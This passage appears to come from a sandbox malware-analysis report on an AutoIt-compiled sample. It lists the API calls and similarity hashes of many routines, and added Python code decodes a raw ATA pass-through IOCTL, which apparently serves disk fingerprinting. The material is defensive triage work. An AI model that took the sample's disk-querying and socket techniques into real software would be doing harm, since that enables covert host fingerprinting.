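        print(r.label(), r.fields.get("API ID", ""), tags(r), posted_messages(r), r.api_names())
```

Run it over the whole exported listing instead of SAMPLE and sort by tag to get the short list of routines worth opening in the dump; the "Opcode ID" field parsed here is what you would pivot on to find the same routine in other AutoIt-compiled samples.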
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00898AE0
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00898AF2
                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00898AFF
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898B16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastacceptselect
                                                                                • String ID:
                                                                                • API String ID: 385091864-0
                                                                                • Opcode ID: cb63b934232d6c536da32af7a8785f625a347d31789ac45ea1a5e516db88f9ae
                                                                                • Instruction ID: c72afb055b87ac9ae8d43e3f0223681a35e03aebea7bfa77cc42ee6fc671a2e7
                                                                                • Opcode Fuzzy Hash: cb63b934232d6c536da32af7a8785f625a347d31789ac45ea1a5e516db88f9ae
                                                                                • Instruction Fuzzy Hash: E0216671A001249FCB11AF69C885E9EBBFCFF4A350F04416AF849D7251DB749E458F91
                                                                                APIs
                                                                                  • Part of subcall function 00881E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?), ref: 00881E77
                                                                                  • Part of subcall function 00881E68: lstrcpyW.KERNEL32(00000000,?,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00881E9D
                                                                                  • Part of subcall function 00881E68: lstrcmpiW.KERNEL32(00000000,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?), ref: 00881ECE
                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880AD4
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880AFA
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 539ef1deb81c7fdbeb62a44fd0f27b7df5977c6af67a0e082bb3bc82c8ca8eae
                                                                                • Instruction ID: 555b8aa1162bfa25bc6b5c8ccad3d5add158d9f6dd4ff51455b979fb23497acb
                                                                                • Opcode Fuzzy Hash: 539ef1deb81c7fdbeb62a44fd0f27b7df5977c6af67a0e082bb3bc82c8ca8eae
                                                                                • Instruction Fuzzy Hash: 86118136200305AFDB25BF34DC45D7A77B8FF45364B80416AE906CB250EB71A855CBA1
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00872FB5
                                                                                  • Part of subcall function 0086395C: __FF_MSGBANNER.LIBCMT ref: 00863973
                                                                                  • Part of subcall function 0086395C: __NMSG_WRITE.LIBCMT ref: 0086397A
                                                                                  • Part of subcall function 0086395C: RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 94e41ee99c6174c52a1d09452ac3d1245645ed3addef1ceedbf5dfd09129e936
                                                                                • Instruction ID: e6343694d1df1e159e194c0e0b0ac48bd1ab0cc18e40f5d77196bbce1164a76b
                                                                                • Opcode Fuzzy Hash: 94e41ee99c6174c52a1d09452ac3d1245645ed3addef1ceedbf5dfd09129e936
                                                                                • Instruction Fuzzy Hash: D9110632409616AFCF313B78AC0566A3BA4FF00364F21C825F85DDA155DF35C940AAD2
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008805AC
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008805C7
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008805DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 00880632
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                • String ID:
                                                                                • API String ID: 3137044355-0
                                                                                • Opcode ID: 28ba095dab25a42740f402f75914596a649aa2a1f3d09157b2ec67eff74bb18b
                                                                                • Instruction ID: db99ff7021219a4a335876bd2873a1831c2ed6e372171988a70e4cd6771b9244
                                                                                • Opcode Fuzzy Hash: 28ba095dab25a42740f402f75914596a649aa2a1f3d09157b2ec67eff74bb18b
                                                                                • Instruction Fuzzy Hash: 1821AC7194030AEFEB60EF94DC88ADABBB8FF50304F00846AE516D6110E770EA58DF60
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00886733
                                                                                • _memset.LIBCMT ref: 00886754
                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008867A6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008867AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                • String ID:
                                                                                • API String ID: 1157408455-0
                                                                                • Opcode ID: e5ae460bf705edd06e19cbca430216e38628bd9450bda242531ba955db3978cf
                                                                                • Instruction ID: 320722da220b3f424e7901772feda5f7bffd1b83a27022fdc410668e888aaacd
                                                                                • Opcode Fuzzy Hash: e5ae460bf705edd06e19cbca430216e38628bd9450bda242531ba955db3978cf
                                                                                • Instruction Fuzzy Hash: 55110A729012287AE72077A5AC4DFABBABCFF44764F1042AAF504E71C0D2705E808BA4
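The DeviceIoControl record above carries more information than the raw number suggests. The preceding CreateFileW opens its (unresolved) path with GENERIC_READ|GENERIC_WRITE (C0000000), FILE_SHARE_READ|FILE_SHARE_WRITE (3), OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (80), which is the access pattern needed to send commands to a physical drive; the control code 0004D02C splits, under the kernel's CTL_CODE layout, into device type 4 (FILE_DEVICE_CONTROLLER, the SCSI/ATA base), function 0x40B, METHOD_BUFFERED and read+write access, which is IOCTL_ATA_PASS_THROUGH. The following decoder is an added example written for this page, not code from the report or from the sample: it reproduces the CTL_CODE arithmetic, parses a trace line in the report's own format, and flags pass-through IOCTLs whose output buffer could hold a 512-byte ATA IDENTIFY DEVICE reply (the usual way a disk serial is read for hardware fingerprinting). The "IDENTIFY-sized" flag is an inference for triage, not something the report states; the sample trace line is copied from the record above.

```python
"""Decode the IOCTL in a DeviceIoControl trace line from a sandbox report.

Windows builds IOCTL codes with CTL_CODE(DeviceType, Function, Method, Access)
= (DeviceType << 16) | (Access << 14) | (Function << 2) | Method, so any hex
code in a trace can be split back into those four fields offline.
"""
import re

# Field tables (subset of the DDK values; only entries needed here).
DEVICE_TYPES = {
    0x02: "FILE_DEVICE_CD_ROM",
    0x04: "FILE_DEVICE_CONTROLLER",   # IOCTL_SCSI_BASE is this value
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}


def ctl_code(device_type, function, method, access):
    """Same arithmetic as the CTL_CODE macro in the Windows headers."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Codes that matter when a sample talks to storage hardware directly.
KNOWN = {
    ctl_code(0x04, 0x401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x40A, 0, 3): "IOCTL_IDE_PASS_THROUGH",
    ctl_code(0x04, 0x40B, 0, 3): "IOCTL_ATA_PASS_THROUGH",        # 0x0004D02C
    ctl_code(0x04, 0x40C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x2D, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
    ctl_code(0x07, 0x000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
}
RAW_DRIVE_COMMAND = {"IOCTL_SCSI_PASS_THROUGH", "IOCTL_SCSI_PASS_THROUGH_DIRECT",
                     "IOCTL_IDE_PASS_THROUGH", "IOCTL_ATA_PASS_THROUGH",
                     "IOCTL_ATA_PASS_THROUGH_DIRECT"}


def decode_ioctl(code):
    """Split a 32-bit IOCTL into its CTL_CODE fields."""
    code &= 0xFFFFFFFF
    dev, acc = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    func, meth = (code >> 2) & 0xFFF, code & 0x3
    return {
        "device_type": dev,
        "device_name": DEVICE_TYPES.get(dev, "FILE_DEVICE_0x%X" % dev),
        "function": func,
        "method": METHODS[meth],
        "access": ACCESS[acc],
        "name": KNOWN.get(code),   # None for codes not in the table
    }


# Argument names follow the DeviceIoControl prototype; the sandbox prints
# a '?' for values it could not resolve statically.
ARG_NAMES = ("hDevice", "dwIoControlCode", "lpInBuffer", "nInBufferSize",
             "lpOutBuffer", "nOutBufferSize", "lpBytesReturned", "lpOverlapped")
TRACE_RE = re.compile(r"DeviceIoControl\.\w+\(([^)]*)\)")


def parse_trace_line(line):
    """Return the call's arguments keyed by name, or None for other API lines."""
    m = TRACE_RE.search(line)
    if not m:
        return None
    vals = [v.strip() for v in m.group(1).split(",")]
    return {n: (None if v == "?" else int(v, 16)) for n, v in zip(ARG_NAMES, vals)}


def triage(line):
    """Decode one trace line and flag raw drive access with an IDENTIFY-sized buffer."""
    args = parse_trace_line(line)
    if not args or args["dwIoControlCode"] is None:
        return None
    d = decode_ioctl(args["dwIoControlCode"])
    out_size = args["nOutBufferSize"]
    raw = d["name"] in RAW_DRIVE_COMMAND
    # ATA IDENTIFY DEVICE returns 512 bytes (model, firmware, serial). The
    # pass-through output buffer also carries the ATA_PASS_THROUGH_EX header,
    # so a buffer of at least 0x200 bytes is a hint, not proof, of IDENTIFY.
    identify_sized = raw and out_size is not None and out_size >= 0x200
    return {"decoded": d, "out_size": out_size, "raw_drive_command": raw,
            "identify_sized": identify_sized}


# Trace line copied from the report record above (ref 008867A6).
SAMPLE_TRACE = ("DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,"
                "?,00000000), ref: 008867A6")

if __name__ == "__main__":
    r = triage(SAMPLE_TRACE)
    print(r["decoded"]["name"], hex(r["out_size"]), r["identify_sized"])
```

Run it against any DeviceIoControl line from the report; codes outside the small table still decode into device type, function, method and access, which is usually enough to locate the constant in the DDK headers.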
                                                                                APIs
                                                                                  • Part of subcall function 0087AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0087AA79
                                                                                  • Part of subcall function 0087AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0087AA83
                                                                                  • Part of subcall function 0087AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0087AA92
                                                                                  • Part of subcall function 0087AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0087AA99
                                                                                  • Part of subcall function 0087AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0087AAAF
                                                                                • GetLengthSid.ADVAPI32(?,00000000,0087ADE4,?,?), ref: 0087B21B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0087B227
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0087B22E
                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 0087B247
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                • String ID:
                                                                                • API String ID: 4217664535-0
                                                                                • Opcode ID: b74023975fd034c60dbb81144f7bc83f123d69931829746f412328121e5493a6
                                                                                • Instruction ID: b53fb32d81badca84c43984085e8c2da71ca33fc2d641f759cfcae92a4e01bc1
                                                                                • Opcode Fuzzy Hash: b74023975fd034c60dbb81144f7bc83f123d69931829746f412328121e5493a6
                                                                                • Instruction Fuzzy Hash: 42119D71A11205AFCB04AF98CC84BAEB7BAFF85304B14806DE946D7215D731EE44CB10
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0087B498
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4AA
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4C0
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: c2eeb6b666ed4322822deb00fbc0692c5ff48f527d99567c310d5100348cf303
                                                                                • Instruction ID: ffe661b01407b32201d3c080e2df9ace47b19ca2d972fa688e05afff6191f0e5
                                                                                • Opcode Fuzzy Hash: c2eeb6b666ed4322822deb00fbc0692c5ff48f527d99567c310d5100348cf303
                                                                                • Instruction Fuzzy Hash: 3811487A900218FFDB11DFA8C881F9DBBB5FB08700F208091E604B7294D771AE10DB94
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0085B5A5
                                                                                • GetClientRect.USER32(?,?), ref: 008BE69A
                                                                                • GetCursorPos.USER32(?), ref: 008BE6A4
                                                                                • ScreenToClient.USER32(?,?), ref: 008BE6AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
                                                                                • Opcode ID: 2624a95c35aeeaf3d43aacee92ad4f5e59e5d4b053a0149c74eafafaf55b47b3
                                                                                • Instruction ID: a952b1b327b6f352f253d9ba11f78b939effc8605cda278d1784f87486711592
                                                                                • Opcode Fuzzy Hash: 2624a95c35aeeaf3d43aacee92ad4f5e59e5d4b053a0149c74eafafaf55b47b3
                                                                                • Instruction Fuzzy Hash: 01111835900129BFDB14EF98DC45DEE77B9FB29305F100455F902E7241E734AA95CBA1
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00887352
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00887385
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0088739B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008873A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: 47ec2d2fe3f53640818277fcdd5cbb94b67b778d0436507f6b23e436458a1837
                                                                                • Instruction ID: cbec4875e4e2280d8a9d9f7f395c9c8328653231caa6eea5669b0df2dc2f5ce5
                                                                                • Opcode Fuzzy Hash: 47ec2d2fe3f53640818277fcdd5cbb94b67b778d0436507f6b23e436458a1837
                                                                                • Instruction Fuzzy Hash: D311A172A08204AFD701ABAC9C45E9E7BBDFB45354F144265F935D33A1D770DA0097A1
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                • GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: c9047b8b2c4c314fa4875a154743365c97978d3da5130ba103f7f90240d0dc8f
                                                                                • Instruction ID: 0317a1b4766f0087869ce60e0f0fea641ac57ba1c47e93f491867956fb6a45ef
                                                                                • Opcode Fuzzy Hash: c9047b8b2c4c314fa4875a154743365c97978d3da5130ba103f7f90240d0dc8f
                                                                                • Instruction Fuzzy Hash: 5411AD72141A09BFEB229F949C50EEABB69FF08365F040116FE1492150C7319C60EBA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction ID: 450ac7595634fd2d7203162a5b6a35fd327cc3aba877fa6a4c41a2b001388b5a
                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction Fuzzy Hash: 3A014B7300014EBBCF125E88DC018EE3F22FB183A4B589455FA1C99139D336CAB2AB81
                                                                                APIs
                                                                                  • Part of subcall function 00867A0D: __getptd_noexit.LIBCMT ref: 00867A0E
                                                                                • __lock.LIBCMT ref: 0086748F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 008674AC
                                                                                • _free.LIBCMT ref: 008674BF
                                                                                • InterlockedIncrement.KERNEL32(00C727D0), ref: 008674D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 2704283638-0
                                                                                • Opcode ID: 60b67e8de2a63457a5d8eea311f35942096bb5094bb2440000a998a700f6cfca
                                                                                • Instruction ID: 7d0525e040ca44c130bbf9ee36068f75f07bb2c0aa832221ec9b050f28aaafc1
                                                                                • Opcode Fuzzy Hash: 60b67e8de2a63457a5d8eea311f35942096bb5094bb2440000a998a700f6cfca
                                                                                • Instruction Fuzzy Hash: 50018E329056219BD716AF789409B6DBB60FB04728F164009E418E7680DB249941CFCA
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00867AD8
                                                                                  • Part of subcall function 00867CF4: __mtinitlocknum.LIBCMT ref: 00867D06
                                                                                  • Part of subcall function 00867CF4: EnterCriticalSection.KERNEL32(00000000,?,00867ADD,0000000D), ref: 00867D1F
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00867AE5
                                                                                • __lock.LIBCMT ref: 00867AF9
                                                                                • ___addlocaleref.LIBCMT ref: 00867B17
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1687444384-0
                                                                                • Opcode ID: e847cf16f08da988e4a9c76aabbbaef8f607c0f4d30ebfa29b0ca2f71b106227
                                                                                • Instruction ID: 30b3657491cd345d40af43da2d1224fe2f67e80cc20abe5a4afd4c8a950a1ae3
                                                                                • Opcode Fuzzy Hash: e847cf16f08da988e4a9c76aabbbaef8f607c0f4d30ebfa29b0ca2f71b106227
